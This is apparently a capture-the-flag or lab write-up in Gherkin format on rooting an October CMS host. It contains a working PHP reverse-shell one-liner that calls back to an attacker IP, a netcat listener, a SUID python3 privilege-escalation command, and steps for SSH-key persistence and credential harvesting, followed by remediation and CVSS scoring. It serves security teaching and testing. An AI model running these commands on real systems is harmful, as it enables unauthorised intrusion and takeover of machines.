## Version 1.4.1
## language: en

Feature: Executable binary with root privileges
   TOE:
    It's October: 1
  Category:
    Improper Privilege Management
  Location:
    http://192.168.1.205/backend/cms
  CWE:
    CWE-267: Privilege Defined With Unsafe Actions
  Rule:
    REQ.269: https://fluidattacks.com/web/rules/269/
  Goal:
    Get the root flag of the target.
  Recommendation:
    limit privileges granted to only absolutely necessary cases

Background:
  Hacker's software:
    | <Software name> | <Version>         |
    | Ubuntu (Bionic) | 18.04.4 LTS       |
    | Google Chrome   | 80.0.3987.132     |
    | Mitmproxy       | 5.0.1             |
    | Netcat          | 1.187-1ubuntu0.1  |
  TOE information:
    Given access to admin panel
    And I'm in CMS section

  Scenario: Normal use case
    Given the access I could administer all the pages
    And other features of October CMS

  Scenario: Static detection
    Given there isn't a source code
    Then there isn't a static detection scenario either

  Scenario: Dynamic detection
    Given I selected demo theme of OctoberCMS
    And I noticed it has an AJAX example page
    And I accessed to {source of AJAX example page}(s-ajax.png)
    Then I changed it to use shell_exec() and run some commands to get info
    But it was too slow
    And I changed again [to run commands](s-a-2.png) I write in [form](f.png)
    But it was still a slow process to get information
    And I decided to use a reverse shell
    When I run the command below in hacker terminal to open a port
    """
    $ nc -l -p 3333
    """
    And I used the following command to connect to server bash to my port
    """
    php -r '$sock=fsockopen("192.168.1.7",3333);
    exec("/bin/sh -i <&3 >&3 2>&3");'
    """
    And the connection was [established](r-shell.png)
    Then I kept looking for credentials or some hint about armour and root
    But I had no luck
    And I used the following command to know executables with extra privileges
    """
    $ find / -type f -perm -u=s 2>/tmp/dee
    """
    And it showed these bin
    """
    /usr/bin/newgrp
    /usr/bin/su
    /usr/bin/python3.7m
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/mount
    /usr/bin/umount
    /usr/bin/python3.7
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    """
  Scenario: Exploitation
    Given python3 with SUID
    Then I used the commmand below
    """
    $ /usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash ")'
    """
    And finally with extra priveleges I checked out /root
    """
    $ ls -ahl /root/

    total 72K
    drwx------  6 root root 4.0K Mar 27 10:54 .
    drwxr-xr-x 18 root root 4.0K Mar 25 03:26 ..
    -rw-------  1 root root    7 Mar 27 10:54 .bash_history
    -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
    drwxr-xr-x  3 root root 4.0K Mar 27 06:47 .config
    drwx------  3 root root 4.0K Mar 27 06:06 .gnupg
    -rw-r--r--  1 root root 1.8K Mar 27 06:54 .htaccess
    -rw-------  1 root root  115 Mar 27 09:40 .mysql_history
    -rw-r--r--  1 root root  148 Aug 17  2015 .profile
    -rw-------  1 root root   24 Mar 27 10:28 .python_history
    drwxr-xr-x  2 root root 4.0K Mar 25 04:30 .ssh
    drwxr-xr-x  2 root root 4.0K Mar 27 09:49 .vim
    -rw-------  1 root root  14K Mar 27 10:54 .viminfo
    -rw-r--r--  1 root root  209 Mar 27 09:46 .wget-hsts
    -rw-r--r--  1 root root   74 Mar 27 10:50 proof.txt
    """
    And proof.txt looks like the possible flag
    But I prefer to use a better interface now
    And I added a public ssh key to [authorized_keys](a-keys.png)
    And I logged offically as [root](root.png)

  Scenario Outline: Extraction
  Here I share some information I collected
    Given I could run commands from TOE
    And the CMS has a directory to share files
    Then I could use grep, find and other commands to collect information
    And I could get for example the admin credential for mysql database
    But I couldn't achieve my original objective
    Examples:
      | <description>               | <evidence>      |
      | all files                   | all-files.png   |
      | all text files              | all-f-text.png  |
      | mysql configuration         | mysql-cnf.png   |
      | lines with password         | password.png    |
      | ssh inside file             | ssh-inside.png  |
      | file names with ssh inside  | ssh-paths.png   |

  Scenario: Remediation
    Given There are different vulnerabilities
    But some of them are necessary permission for some plugins of OctoberCMS
    Then I removed root execution privileges of python3.7
    """
    $ chmod u-s /usr/bin/python3.7
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.1/10 (Critical) - AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.7/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High)     - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-15
